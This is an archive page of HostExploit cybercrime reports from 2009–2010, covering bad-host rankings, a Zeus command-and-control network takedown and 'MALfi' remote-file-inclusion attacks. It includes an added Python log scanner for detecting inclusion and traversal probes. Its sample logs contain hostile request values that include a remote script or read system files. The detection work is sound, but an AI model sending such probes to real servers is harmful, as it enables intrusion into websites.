Thursday, December 18, 2014


Top 50 Bad Hosts, Q2 2010

Thursday, 15 July 2010 08:13 in Blogs, Reports by Will Rogofsky


Press Release

HostExploit is pleased to present the Q2 2010 report on the ‘Top 50 Bad Hosts and Networks’. At rank #1 in the report, Demand Media/eNom (USA) earns the label of ‘worst host’ from security analysts at HostExploit, taking over the top spot from Ecatel (Netherlands). A detailed analysis shows high levels of Internet ‘badness’ and cybercriminal activity hosted by Demand Media/eNom in their role as a hosting provider.

Download the report here.

Using data, supplied by, together with Open Source Security data partners, HostExploit has released an updated HE Index of the worst internet hosting operators around the world. Compiled by actuarial analysis on data provided from all 34,748 public ASes (Autonomous Systems), the HE Index is presented as an easy-to-understand ‘badness’ rating, on a scale of 0 to 1000, published in tables and charts. With a focus on the worst aspects of cybercriminal activity, the HE Index also takes into account factors such as: size of network; potential for the hosting of botnets; distribution of malware, exploits, rogues and spam.


AS50896 PROXIEZ – Overview of a Crime Server

Monday, 17 May 2010 22:02 in Blogs, Reports by Jart Armin

At 9:00am EST on Friday May 14th, AS50896 PROXIEZ lost its ability to infect the Internet. To avoid confusion: there were ‘unsuccessful’ attempts to reconnect on Saturday and Sunday, May 15th and 16th, which may account for reports of connections to bots and malware still being alive.

The upstream peer AS50818 DIGERNET was also disconnected from the Internet at 10:30am EST on Friday May 14th. AS50908 EVAUA (InfoPlus Ltd.) is currently attempting to serve the Zeus C&Cs as a replacement for Proxiez.

AS50896 PROXIEZ was issued by RIPE and first active on April 19th 2010, and AS50908 EVAUA was first active on May 17th 2010. This again calls into question the issuance by RIPE of ASNs and IP ranges which are immediately utilized for crime servers.

Mini Report in PDF can be downloaded here (registration required).


Top 50 Bad Hosts March 2010 - New Report

Monday, 05 April 2010 15:40 in Blogs, Reports by Will Rogofsky

HostExploit is pleased to present the Q1 2010 report on the Top 50 Bad Hosts and Networks. Using our own data, supplied by, together with Open Security partners, HostExploit has compiled an updated HE Index of the worst internet hosting players around the world.

Download the report here.

Findings in the report are based on data generated by public ASes (Autonomous Systems) exchanging routing information with each other over the public internet. ‘Bad’ activity in this context includes traffic generated by botnets, spam, MALfi, phishing, malware, exploits and the control centers that manage these activities.

By using a unique combination of actuarially-weighted mathematical equations, a bespoke ‘badness’ rating is created showing the worst hosting organizations for cyber-criminal activity. Consideration is given to the size of each network and related potential for malware distribution where larger servers should have the means to track cyber-criminal activity more effectively.


Report - Top 50 Bad Hosts & Networks 2009

Monday, 14 December 2009 12:00 in Blogs, Reports by Will Rogofsky


HostExploit is proud to announce the “winners” of the Bad Internet Host of 2009 awards, alongside the definitive Top 50 Bad Hosts and Networks report. The findings are powered by the newly-created HE Index - a numerical representation of internet badness.

Download the report here.

The report comprises an exhaustive analysis of the Internet hosting industry (servers and Autonomous Systems) by the researchers at HostExploit, with community input and data from 16 authoritative community sources. The result is a definitive list of the worst commercial servers around the globe, in terms of server badness. Detailed reports on each of the top 150 bad servers can be viewed on

The report analyses the wide range of crimes which affect all of our lives, and through the use of sophisticated math and our researchers’ vast experience, HostExploit has been able to produce what is perhaps the most definitive list to date and an easy-to-understand badness index. Beyond this, the report analyses the effects by country, the worst culprits within cybercrime categories (i.e. spam, malicious software, malware, botnet serving, Zeus, etc.), the attack vectors for specific cybercriminal activities and much more.

Legitimate businesses may wish to reconsider hosting a web site with a hosting service which has a high HE Index. In addition to supporting a hosting service that has a disproportionate amount of malicious activity, there is the risk of being blacklisted by having your web site on such a server.

However, it is not all bad news; part of the project also provides examples of the cleanest hosts around the world to demonstrate how such Internet badness can be avoided by commercial servers.

In providing this report, the emphasis was to review servers that could be considered medium to large scale commercial operations, with a few exceptions. The report highlights the issues which face the internet community due to the lack of accountability required of internet service providers whose servers are utilized for cybercrime.

This new report is available for a free PDF download at - the producers of community reports exposing RBN (Russian Business Network), Atrivo, McColo and Real Host, and a foremost source of rogue and malicious network activity analysis on the Internet.


MALfi A Silent Threat

Wednesday, 11 November 2009 07:58 in Blogs, Reports by Jart Armin

Cyber Crime International – MALfi

A new cybercrime report from the producers of the definitive reports
exposing RBN (Russian Business Network), Atrivo, McColo, Real Host, and a foremost
source of rogue network activity analysis on the Internet.

Download the report here.

MALfi “A Silent Threat”

What is it all about, MALfi? A blended threat currently detected on around 350,000 websites &
Internet servers. One major purpose is to establish “use once and throw away” disposable
botnets for spam, phishing, DDoS and exploits.
Full Report (public version) download PDF – HostExploit Download page =

Abstract / Press Release

MALfi is a holistic and descriptive term for the recent blended attack utilized by hackers and
cyber criminals to compromise websites and servers. It is a combination of RFI (remote file
inclusion), LFI (local file inclusion), XSA (cross server attack), and RCE (remote code
execution).

Conservative estimates over recent months indicate around 350,000 affected websites and
servers worldwide. HostExploit and associated researchers have tracked 103,351 attacks,
involving 2,743 unique IP addresses, with 85 countries involved in RFI scanning and 911 ASNs

RFI is used by hackers to compromise websites and upload a remote user interface shell. This
ensures partial to full manual and unauthorized control over the server. This differs from the
now familiar “drive by” web site exploit as it provides hackers with a ready-made arena where
internet plunder, in the form of information, controlled servers and web sites, is exchanged or
resold to cyber criminal groups.

Essentially the RFI hackers continuously and automatically search for website vulnerabilities for
exploitation. Once breached, the websites and often the now compromised underlying servers,
are utilized for DDoS (distributed denial of service) attacks such as the recent US and Korean
government DDoS, spamming, phishing, large scale ID theft and to facilitate further attacks on
other targets. It follows that many of the regular and apparently attempted attacks on various
high volume governmental and key servers were RFI and similar vulnerability scanning, bots
and scripts.

Compared with SQL injection, viruses and worms, RFI scanning and related exploitation
happens continuously and affects all corners of the Internet. Both un-patched Windows systems
and systems with RFI vulnerabilities are on a theoretical “time to live”.

The three distinct stages of this serious but silent threat to Internet security are:

First stage – Remote File Inclusion Attack: Hacked websites and servers are not infectious to
the web visitor and remain undetected by most AV vendors including, for example, Google’s
safe browsing feature. This “crack in the door” provides for the second stage.

Second stage – Doing Damage: Here the compromised websites and servers have attacker
tools uploaded. These consist of both purchased and custom written tools to conduct nefarious
activities such as sending phishing emails, hosting phishing sites, sending SPAM, hosting
malware, defacing, DDoS and much more. XSA (Cross server attacks), LFI (local file inclusion),
and RCE (remote code execution) further compromise the system or other remote systems.

Third stage – Detection Avoidance: Upon completion of the cybercriminal action or discovery of
their attack, the miscreant removes their tools or causes them to self destruct before moving on.
With full control of the system, covering their tracks is accomplished easily.
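
A defender's view of the first stage, as an added example that is not part of the HostExploit report: a scan of web access logs for query parameters whose decoded value is a remote URL (RFI) or a directory traversal (LFI), counted per source address. The combined log format, the sample lines and the `url_params` allowlist are assumptions made for the illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed sample lines in combined log format; addresses and hosts are documentation values.
SAMPLE_LOG = """\
192.0.2.10 - - [11/Nov/2009:07:58:01 +0000] "GET /index.php?page=http://files.example.invalid/id.txt? HTTP/1.1" 200 512
192.0.2.10 - - [11/Nov/2009:07:58:02 +0000] "GET /view.php?inc=http%3A%2F%2Ffiles.example.invalid%2Fid.txt%3F HTTP/1.1" 404 210
198.51.100.7 - - [11/Nov/2009:08:01:10 +0000] "GET /login.php?return=/account HTTP/1.1" 200 1024
203.0.113.44 - - [11/Nov/2009:08:02:33 +0000] "GET /news.php?file=../../../../etc/hosts HTTP/1.1" 200 300
198.51.100.7 - - [11/Nov/2009:08:03:00 +0000] "GET /out.php?url=http://partner.example.invalid/ HTTP/1.1" 302 0
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
REMOTE_URL_RE = re.compile(r'^(?:https?|ftps?)://', re.IGNORECASE)  # RFI: value is a remote URL
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.[\\/]')                  # LFI: value climbs directories


def find_inclusion_probes(log_text, url_params=frozenset({"url"})):
    """Return (ip, kind, path, param, status) for each suspicious query parameter.

    url_params is a hypothetical allowlist of parameters that legitimately carry
    URLs (redirectors and the like); tune it per application to limit false positives.
    """
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        path, _, query = target.partition("?")
        # parse_qsl percent-decodes values, so encoded probes are caught too
        for param, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value) and param.lower() not in url_params:
                hits.append((ip, "RFI", path, param, status))
            elif TRAVERSAL_RE.search(value):
                hits.append((ip, "LFI", path, param, status))
    return hits


def probes_per_source(hits):
    """Count probes per source address."""
    return Counter(ip for ip, *_ in hits)


if __name__ == "__main__":
    for hit in find_inclusion_probes(SAMPLE_LOG):
        print(hit)
```

A 200 status on a hit does not show that an inclusion succeeded; it only marks which requests to triage first. Parameters sent in POST bodies do not appear in access logs and need application-level or WAF logging to be seen.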

With this technique there is no master server and no simple tracking. The compromised servers
are controlled via various anonymous web proxies and compromised hosts, in a totally
de-centralized manner. IRC (internet relay chat) is primarily used in a cell-like communication
structure to co-ordinate efforts and to launch vulnerability scans.

Identification of specific botnets such as Storm or Cutwail has been used to gather valuable
cyber criminal intelligence but the de-centralized nature of RFI based attacks requires deeper
investigation and wider application of fundamental COMINT (communication intelligence)
techniques. Even after being discovered, hackers using the RFI technique still have the
compromised web sites to re-launch from or even to re-utilize. The whole process begins again
with scanning for vulnerabilities with a new disposable single use botnet.

The how, what and where of this particular hacking technique and cybercrime business model
are provided together with detailed and graphic explanations in the HostExploit community
research report.

For report download here
- for further information contact:

Jart Armin – jart (at),

Scott D Logan - scott (at),

General enquiries - admin (at)

Release Date - Nov 11th 2009

